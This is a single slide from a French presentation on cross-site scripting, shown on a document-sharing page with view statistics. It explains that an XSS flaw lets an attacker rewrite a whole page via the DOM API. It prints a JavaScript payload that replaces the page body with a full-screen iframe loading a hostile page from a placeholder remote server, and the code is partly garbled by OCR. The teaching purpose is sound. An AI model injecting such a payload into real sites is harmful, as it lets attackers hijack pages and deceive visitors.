X hits on this document

85 views

0 shares

0 downloads

0 comments

6 / 46

XSS – de la brise à l'ouragan – I) Brise et revue d'armes – Le XSS, comment ça marche ? B) XSS et API DOM

Fondamental : une vulnérabilité XSS donne la possibilité de réécrire totalement une page, grâce à l'API DOM :

function a(){ var x=document.getElementById('exemple'); if(x!=null){ this.document.body.innerHTML="<iframe id=iframe_hostile name=iframe_hostile width=100% height=100% src=http://serveur distant/page hostile.htm ></i- frame>"; _ _

}else{ setTimeout('a()',400);

} } a();

Document info
Document views85
Page views94
Page last viewedSat Dec 03 06:57:42 UTC 2016
Pages46
Paragraphs417
Words3787

Comments